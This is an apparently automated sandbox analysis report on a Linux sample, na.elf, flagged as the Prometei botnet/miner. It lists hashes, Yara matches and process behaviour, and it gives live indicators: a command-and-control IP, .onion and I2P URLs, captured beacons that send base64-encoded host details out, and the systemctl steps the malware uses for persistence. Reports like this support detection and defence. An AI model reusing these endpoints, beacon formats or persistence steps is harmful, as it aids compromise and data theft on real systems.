Linux Analysis Report
na.elf

Overview

General Information

Sample name: na.elf
Analysis ID: 1649541
MD5: 9a03fbbc11a8889811e8b94054f4a6c3
SHA1: 5eeaac16a877f36a4cd8a4d67025c258162215c0
SHA256: 827b3f46d241b725e4dbcb60ba267c01b54ad5e8386fe8a441e2892d5872764a
Tags: elfuser-abuse_ch
Infos:

Detection

Prometei
Score: 100
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Prometei
Drops files in suspicious directories
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Found Tor onion address
Sample deletes itself
Sample is packed with UPX
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "pgrep" command search for and/or send signals to processes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "uname" command used to read OS and architecture name
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to set the executable flag
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: na.elf Avira: detected
Antivirus detection for dropped file
Source: /usr/sbin/uplugplay Avira: detection malicious, Label: LINUX/GM.Agent.JQ
Multi AV Scanner detection for submitted file
Source: na.elf ReversingLabs: Detection: 47%

Bitcoin Miner
barindex
Yara detected Prometei
Source: Yara match File source: Process Memory Space: na.elf PID: 5508, type: MEMORYSTR
Reads CPU information from /proc indicative of miner or evasive malware
Source: /usr/sbin/uplugplay (PID: 5558) Reads CPU info from proc file: /proc/cpuinfo Jump to behavior
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pgrep (PID: 5512) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pgrep (PID: 5526) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5558) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/uptime (PID: 5704) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/uptime (PID: 5705) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/uptime (PID: 5727) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior

Networking
barindex
Found Tor onion address
Source: na.elf, 5508.1.000000000052d000.0000000001575000.rw-.sdmp String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: na.elf, 5508.1.000000000052d000.0000000001575000.rw-.sdmp String found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cgi-bin/p.cgi?r=22&i=5450N26I9XHCFG7N HTTP/1.0Host: 152.36.128.18
Source: global traffic HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDE1OjU4OjI1IHVwIDIgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAxLjM1LCAwLjYzLCAwLjI0fDE3NDMwMjI3MDUNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=5450N26I9XHCFG7N&h=galassia&enckey=bBZFqwImjp1SEFri9sjpeAec+DeAJ4iLPMgtzjPQiroA6M//gex5m646QGRKEK4n+yPW8wFIgleVVGrYtQOMIH/VlndC9f8vplF/gfDks4TLFKxaRcFfKhF/dbsLazsJav6bo2Gttp70XtFx7zcA/nhx4sOWAFy7q+RqZf9vuUo= HTTP/1.0Host: 152.36.128.18
Sample listens on a socket
Source: /usr/sbin/uplugplay (PID: 5558) Socket: 0.0.0.0:89 Jump to behavior
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.14:40760 -> 152.36.128.18:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.14:40762 -> 152.36.128.18:80
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: unknown TCP traffic detected without corresponding DNS query: 152.36.128.18
Source: global traffic HTTP traffic detected: GET /cgi-bin/p.cgi?r=22&i=5450N26I9XHCFG7N HTTP/1.0Host: 152.36.128.18
Source: global traffic HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDE1OjU4OjI1IHVwIDIgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAxLjM1LCAwLjYzLCAwLjI0fDE3NDMwMjI3MDUNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=5450N26I9XHCFG7N&h=galassia&enckey=bBZFqwImjp1SEFri9sjpeAec+DeAJ4iLPMgtzjPQiroA6M//gex5m646QGRKEK4n+yPW8wFIgleVVGrYtQOMIH/VlndC9f8vplF/gfDks4TLFKxaRcFfKhF/dbsLazsJav6bo2Gttp70XtFx7zcA/nhx4sOWAFy7q+RqZf9vuUo= HTTP/1.0Host: 152.36.128.18
Source: na.elf, uplugplay.12.dr String found in binary or memory: http://152.36.128
Source: na.elf, 5508.1.000000000052d000.0000000001575000.rw-.sdmp String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
Source: na.elf, 5508.1.000000000052d000.0000000001575000.rw-.sdmp String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
Source: na.elf, 5508.1.000000000052d000.0000000001575000.rw-.sdmp String found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: na.elf, 5508.1.000000000052d000.0000000001575000.rw-.sdmp String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: na.elf, uplugplay.12.dr String found in binary or memory: http://upx.sf.net
Source: na.elf, 5508.1.000000000052d000.0000000001575000.rw-.sdmp String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: na.elf, type: SAMPLE Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: 5508.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY Matched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
Source: 5508.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY Matched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
Source: 5508.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: /usr/sbin/uplugplay, type: DROPPED Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0x400000
Yara signature match
Source: na.elf, type: SAMPLE Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: 5508.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY Matched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
Source: 5508.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY Matched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
Source: 5508.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: /usr/sbin/uplugplay, type: DROPPED Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: classification engine Classification label: mal100.troj.evad.linELF@0/5@0/0

Data Obfuscation
barindex
Sample is packed with UPX
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $
Creates hidden files and/or directories
Source: /usr/bin/pidof (PID: 5522) Directory: //. Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5564) Directory: <invalid fd (10)>/.. Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3760/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3760/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1583/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1583/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/2672/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/2672/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/110/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/110/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3759/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3759/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/111/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/111/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/112/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/112/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/113/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/113/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/234/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/234/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1577/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1577/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/114/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/114/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/235/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/235/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/115/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/115/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/116/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/116/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/117/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/117/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/118/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/118/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/119/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/119/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3757/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3757/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/10/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/10/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/917/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/917/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3758/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3758/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/11/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/11/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/12/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/12/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/13/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/13/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/14/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/14/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/15/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/15/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/16/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/16/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/17/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/17/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/18/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/18/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/19/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/19/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1593/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1593/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/240/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/240/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/120/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/120/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3094/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3094/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/121/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/121/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/242/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/242/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3406/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3406/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/122/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/122/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/243/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/243/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/2/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/2/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/123/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/123/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/244/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/244/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1589/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1589/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/124/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/124/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/245/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/245/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1588/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/1588/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/125/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/125/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/4/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/4/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/246/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/246/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3402/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/3402/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/126/status Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) File opened: /proc/126/cmdline Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/na.elf (PID: 5511) Shell command executed: sh -c "pgrep na.elf" Jump to behavior
Source: /tmp/na.elf (PID: 5521) Shell command executed: sh -c "pidof na.elf" Jump to behavior
Source: /tmp/na.elf (PID: 5525) Shell command executed: sh -c "pgrep uplugplay" Jump to behavior
Source: /tmp/na.elf (PID: 5531) Shell command executed: sh -c "pgrep upnpsetup" Jump to behavior
Source: /tmp/na.elf (PID: 5533) Shell command executed: sh -c "systemctl daemon-reload" Jump to behavior
Source: /tmp/na.elf (PID: 5538) Shell command executed: sh -c "systemctl enable uplugplay.service" Jump to behavior
Source: /tmp/na.elf (PID: 5546) Shell command executed: sh -c "systemctl start uplugplay.service" Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5557) Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc" Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5562) Shell command executed: sh -c hostnamectl Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5701) Shell command executed: sh -c uptime Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5703) Shell command executed: sh -c uptime Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5708) Shell command executed: sh -c "dmidecode --type baseboard" Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5712) Shell command executed: sh -c "uname -a" Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5715) Shell command executed: sh -c "dmidecode --type baseboard" Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5720) Shell command executed: sh -c dmidecode Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5726) Shell command executed: sh -c uptime Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5730) Shell command executed: sh -c "uname -a" Jump to behavior
Executes the "pgrep" command search for and/or send signals to processes
Source: /bin/sh (PID: 5512) Pgrep executable: /usr/bin/pgrep -> pgrep na.elf Jump to behavior
Source: /bin/sh (PID: 5526) Pgrep executable: /usr/bin/pgrep -> pgrep uplugplay Jump to behavior
Source: /bin/sh (PID: 5532) Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetup Jump to behavior
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /bin/sh (PID: 5534) Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload Jump to behavior
Source: /bin/sh (PID: 5539) Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.service Jump to behavior
Source: /bin/sh (PID: 5547) Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.service Jump to behavior
Reads system information from the proc file system
Source: /usr/sbin/uplugplay (PID: 5558) Reads from proc file: /proc/cpuinfo Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5558) Reads from proc file: /proc/stat Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5558) Reads from proc file: /proc/meminfo Jump to behavior
Sample tries to set the executable flag
Source: /tmp/na.elf (PID: 5508) File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r) Jump to behavior
Writes ELF files to disk
Source: /tmp/na.elf (PID: 5508) File written: /usr/sbin/uplugplay Jump to dropped file
Source: submitted sample Stderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection
barindex
Drops files in suspicious directories
Source: /tmp/na.elf (PID: 5508) File: /usr/sbin/uplugplay Jump to dropped file
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Source: /bin/sh (PID: 5709) Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard Jump to behavior
Source: /bin/sh (PID: 5717) Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard Jump to behavior
Source: /bin/sh (PID: 5721) Dmidecode executable: /usr/sbin/dmidecode dmidecode Jump to behavior
Sample deletes itself
Source: /tmp/na.elf (PID: 5508) File: /tmp/na.elf Jump to behavior
ELF contains segments with high entropy indicating compressed/encrypted content
Source: na.elf Submission file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: na.elf Submission file: segment LOAD with 7.943 entropy (max. 8.0)
Source: uplugplay.12.dr Dropped file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: uplugplay.12.dr Dropped file: segment LOAD with 7.943 entropy (max. 8.0)
Reads CPU information from /proc indicative of miner or evasive malware
Source: /usr/sbin/uplugplay (PID: 5558) Reads CPU info from proc file: /proc/cpuinfo Jump to behavior
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pgrep (PID: 5512) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pgrep (PID: 5526) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pgrep (PID: 5532) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5558) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/uptime (PID: 5704) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/uptime (PID: 5705) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/uptime (PID: 5727) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/na.elf (PID: 5508) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5548) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5558) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 5716) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 5731) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5564) Queries kernel information via 'uname': Jump to behavior

Language, Device and Operating System Detection
barindex
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Source: /bin/sh (PID: 5709) Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard Jump to behavior
Source: /bin/sh (PID: 5717) Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard Jump to behavior
Source: /bin/sh (PID: 5721) Dmidecode executable: /usr/sbin/dmidecode dmidecode Jump to behavior
Executes the "uname" command used to read OS and architecture name
Source: /bin/sh (PID: 5716) Uname executable: /usr/bin/uname -> uname -a Jump to behavior
Source: /bin/sh (PID: 5731) Uname executable: /usr/bin/uname -> uname -a Jump to behavior
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
152.36.128.18
 unknown United States
81 NCRENUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://152.36.128.18/cgi-bin/p.cgi?r=22&i=5450N26I9XHCFG7N true
  • Avira URL Cloud: malware
 unknown